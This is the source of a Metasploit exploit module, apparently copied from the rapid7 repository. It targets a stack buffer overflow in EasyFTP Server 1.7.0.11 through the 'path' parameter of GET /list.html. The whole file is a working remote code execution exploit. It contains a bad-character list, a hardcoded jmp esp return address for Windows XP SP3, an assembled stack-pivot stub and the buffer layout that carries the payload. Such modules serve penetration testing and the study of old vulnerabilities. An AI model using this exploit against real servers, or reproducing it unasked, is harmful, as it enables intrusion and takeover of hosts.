GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Server-banner pattern consumed by http_fingerprint. #check matches the
  # same string, so detection in this module is banner-based only.
  HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }

  # Provides http_fingerprint and send_request_raw used below.
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata (targets, payload constraints, references)
  # and the basic-auth options the HTTP client uses for its requests.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'EasyFTP Server list.html path Stack Buffer Overflow',
        'Description' => %q{
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
and earlier. EasyFTP fails to check input size when parsing the 'path' parameter
supplied to an HTTP GET request, which leads to a stack based buffer overflow.
EasyFTP allows anonymous access by default; valid credentials are typically
unnecessary to exploit this vulnerability.

After version 1.7.0.12, this package was renamed "UplusFtp".

Due to limited space, as well as difficulties using an egghunter, the use of
staged, ORD, and/or shell payloads is recommended.
},
        'Author' => [
          'ThE g0bL!N', # Original exploit [see References]
          'jduck' # Metasploit re-implementation
        ],
        'References' => [
          [ 'OSVDB', '66614'],
          [ 'EDB', '11500' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Privileged' => true,
        'Payload' => {
          # Hard limit; #exploit refuses to run when the encoded payload is longer.
          'Space' => 256,
          # NUL, whitespace, and the URL/query delimiters ('#', '%', '&', '+',
          # '/', ';', '?', '\') that would cut or mangle the 'path' value in transit.
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",
          'Compat' =>
          {
            'ConnectionType' => '+ws2ord',
          },
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows XP SP3 - Easy FTP Server Universal',
            # NOTE: It's not possible to use addresses within the
            # binary due to the nul byte.
            {
              # Fixed OS-DLL address; this is what ties the target to XP SP3.
              'Ret' => 0x7cc5d507 # jmp esp in shell32.dll
              # 'Ret' => 0xdeadbeef
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-02-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Anonymous access is the product default (see 'Description'), so these
    # defaults are usually enough; override them when the server requires more.
    # NOTE(review): the default HttpPassword value below looks mangled by the
    # page's e-mail obfuscation — confirm against the upstream source.
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
        OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])
      ]
    )
  end

  # Banner check only: Detected when the fingerprint contains the Easy-Web
  # Server string, Safe otherwise. No version is parsed, so this never
  # distinguishes a patched build from a vulnerable one.
  #
  # @return [Exploit::CheckCode] Detected or Safe
  def check
    info = http_fingerprint # check method
    if info and (info =~ /Easy\-Web Server\//)
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Sends a single GET /list.html request whose 'path' query value carries the
  # overflow. Layout of `path` by offset: [0] payload, [268] target.ret,
  # [280] stub, each gap filled with rand_text, padded to 332 bytes in total.
  # On the wire this is one request with a ~332-byte query value, which is
  # the observable a defender can alert on.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the encoded payload
  #   is longer than payload_space
  def exploit
    if (payload.encoded.length > payload_space)
      fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")
    end

    # Fix up ESP, jmp to the beginning of the buffer
    # 0xfffffee8 is -0x118 (-280), the same distance as the stub's offset in
    # `path`; presumably that is how edi lands on the start of the buffer —
    # verify against the original exploit. 0xfffffc04 moves esp far below
    # the current stack position before the jump.
    stub_asm = %q{
mov edi, esp
add esp, 0xfffffc04
add edi, 0xfffffee8
jmp edi
}
    stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

    # Build the path up
    path = ''
    path << payload.encoded
    path << rand_text(268 - path.length)
    # NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.
    path << [target.ret].pack('V') # little-endian dword at offset 268
    path << rand_text(280 - path.length)
    path << stub
    path << rand_text(332 - path.length)

    uri = "/list.html?path="
    uri << path

    print_status("Trying target #{target.name}...")
    # 5-second timeout; the module expects no reply (see the branch below).
    res = send_request_raw({ 'uri' => uri }, 5)

    if (res)
      # A reply means the server parsed the request and kept running, which
      # the module treats as a sign the overflow did not take effect.
      print_error("The server unexpectedly responded, this is not good.")
      print_status(res.to_s)
    end

    handler
  end
end